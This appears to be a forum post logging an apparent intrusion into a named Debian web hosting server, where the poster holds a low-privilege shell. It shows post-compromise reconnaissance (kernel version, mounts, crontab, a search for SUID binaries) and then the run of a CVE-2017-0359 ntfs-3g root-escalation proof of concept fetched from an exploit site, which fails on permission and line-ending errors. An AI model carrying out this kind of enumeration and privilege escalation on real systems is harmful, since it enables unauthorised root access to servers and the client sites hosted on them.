Guest
Posts: n/a
Time spent on forum: 60408
Reputation: 0
uname -a
Code:
Linux winetime.ellyt.com 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64 GNU/Linux
sh-4.3$ ls -la /boot
Code:
total 20512
drwxr-xr-x 3 root root 4096 Jun 1 08:25 .
drwxr-xr-x 23 root root 4096 Jun 1 09:11 ..
-rw-r--r-- 1 root root 2681172 Mar 8 01:59 System.map-3.16.0-4-amd64
-rw-r--r-- 1 root root 157815 Mar 8 01:59 config-3.16.0-4-amd64
drwxr-xr-x 5 root root 4096 Apr 6 11:52 grub
-rw-r--r-- 1 root root 15017568 Jun 1 08:25 initrd.img-3.16.0-4-amd64
-rw-r--r-- 1 root root 3128784 Mar 8 01:58 vmlinuz-3.16.0-4-amd64
ls -la --full-time /lib
Code:
total 280
drwxr-xr-x 16 root root 4096 2017-06-01 08:24:38.147095248 +0300 .
drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
lrwxrwxrwx 1 root root 21 2017-04-07 21:12:08.155124000 +0300 cpp -> /etc/alternatives/cpp
drwxr-xr-x 2 root root 4096 2017-04-06 11:11:32.822435000 +0300 discover
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:06.370435000 +0300 ifupdown
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.358435000 +0300 init
-rwxr-xr-x 1 root root 71416 2014-10-05 04:01:50.000000000 +0300 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so
lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 15 2014-11-08 19:03:39.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
-rw-r--r-- 1 root root 10544 2014-11-08 19:03:41.000000000 +0200 libipq.so.0.0.0
lrwxrwxrwx 1 root root 16 2014-11-08 19:03:39.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5816 2014-11-08 19:03:41.000000000 +0200 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 20 2014-11-08 19:03:39.000000000 +0200 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r-- 1 root root 51896 2014-11-08 19:03:42.000000000 +0200 libxtables.so.10.0.0
drwxr-xr-x 3 root root 4096 2017-04-06 11:07:50.206435000 +0300 lsb
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.734435000 +0300 modprobe.d
drwxr-xr-x 3 root root 4096 2017-04-06 11:08:31.846435000 +0300 modules
drwxr-xr-x 2 root root 4096 2017-06-01 08:24:38.227099822 +0300 modules-load.d
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.270435000 +0300 startpar
drwxr-xr-x 8 root root 4096 2017-04-06 11:07:55.662435000 +0300 systemd
drwxr-xr-x 15 root root 4096 2017-04-06 11:07:27.242435000 +0300 terminfo
drwxr-xr-x 4 root root 4096 2017-04-06 11:08:00.966435000 +0300 udev
drwxr-xr-x 2 root root 4096 2017-04-22 18:39:02.116227245 +0300 ufw
drwxr-xr-x 4 root root 12288 2017-06-01 08:24:52.967942493 +0300 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.490435000 +0300 xtables
ls -la --full-time /lib64
Code:
total 8
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:37.814435000 +0300 .
drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
lrwxrwxrwx 1 root root 32 2016-11-28 06:26:42.000000000 +0200 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
mount
Code:
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=255197,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=411712k,mode=755)
/dev/sda2 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
mqueue on /dev/mqueue type mqueue (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
/dev/sdb1 on /var type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdc1 on /backup type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdb1 on /var/www/clients/client2/web7/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
/dev/sdb1 on /var/www/clients/client2/web6/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdb1 on /var/www/clients/client2/web8/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
df -h
Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 3.0G 1.8G 1.1G 62% /
udev 10M 0 10M 0% /dev
tmpfs 403M 41M 362M 11% /run
tmpfs 1006M 0 1006M 0% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 1006M 0 1006M 0% /sys/fs/cgroup
/dev/sdb1 99G 40G 54G 43% /var
/dev/sdc1 99G 359M 93G 1% /backup
Code:
Debian GNU/Linux 8 \n \l
cat /etc/crontab
Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat /proc/version
Code:
Linux version 3.16.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07)
cat /proc/sys/vm/mmap_min_addr
pwd
Code:
/var/www/clients/client2/web8/web/modules/crm
ls -la /usr/bin/staprun
Code:
ls: cannot access /usr/bin/staprun: No such file or directory
sh-4.3$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Code:
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 90456 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 23472 Apr 7 21:58 /usr/sbin/jk_chrootsh
-rwsr-xr-x 1 root root 13824 Apr 7 21:58 /usr/sbin/jk_procmailwrapper
-rwsr-xr-- 1 root www-data 18472 Feb 24 20:40 /usr/lib/apache2/suexec-pristine
-rwsr-xr-x 1 root root 10104 Mar 28 08:33 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 464904 Jul 22 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 39912 Feb 24 10:09 /usr/bin/newgrp
-rwsr-sr-x 1 root mail 89248 Feb 11 2015 /usr/bin/procmail
-rwsr-xr-x 1 root root 54192 Feb 24 10:09 /usr/bin/passwd
-rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 75376 Feb 24 10:09 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44464 Feb 24 10:09 /usr/bin/chsh
-rwsr-xr-x 1 root root 53616 Feb 24 10:09 /usr/bin/chfn
-rwsr-xr-x 1 root root 157760 Jan 11 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 146160 Jan 28 12:16 /bin/ntfs-3g
-rwsr-xr-x 1 root root 30800 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40168 Feb 24 10:09 /bin/su
-rwsr-xr-x 1 root root 27416 Mar 30 2015 /bin/umount
-rwsr-xr-x 1 root root 40000 Mar 30 2015 /bin/mount
meow MEOW!
p.s.
/bin/ntfs-3g
Code:
ntfs-3g: No device is specified.
ntfs-3g 2014.2.15AR.2 integrated FUSE 28 - Third Generation NTFS Driver
Configuration type 7, XATTRS are on, POSIX ACLS are on
Copyright (C) 2005-2007 Yura Pakhuchiy
Copyright (C) 2006-2009 Szabolcs Szakacsits
Copyright (C) 2007-2014 Jean-Pierre Andre
Copyright (C) 2009 Erik Larsson
Usage: ntfs-3g [-o option[,...]]
Options: ro (read-only mount), windows_names, uid=, gid=,
umask=, fmask=, dmask=, streams_interface=.
Please see the details in the manual (type: man ntfs-3g).
Example: ntfs-3g /dev/sda1 /mnt/windows
News, support and information: http://tuxera.com
however -> http://0day.today/exploit/26893 ->
Code:
sh-4.3$ /bin/bash /tmp/1.sh
/bin/bash /tmp/1.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/lib': Permission denied
mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/kernel': Permission denied
[*] Forging symlinks ...
ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/lib/modules\r/3.16.0-4-amd64\r\r': No such file or directory
ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/kernel/fs\r/fuse\r': No such file or directory
ln: failed to create symbolic link 'fuse.ko\r': Permission denied
[*] Pulling in deps ...
[*] Building kernel module ...
/tmp/1.sh: line 25: $'\r': command not found
/tmp/1.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
: Permission denied cve_2017_0358.c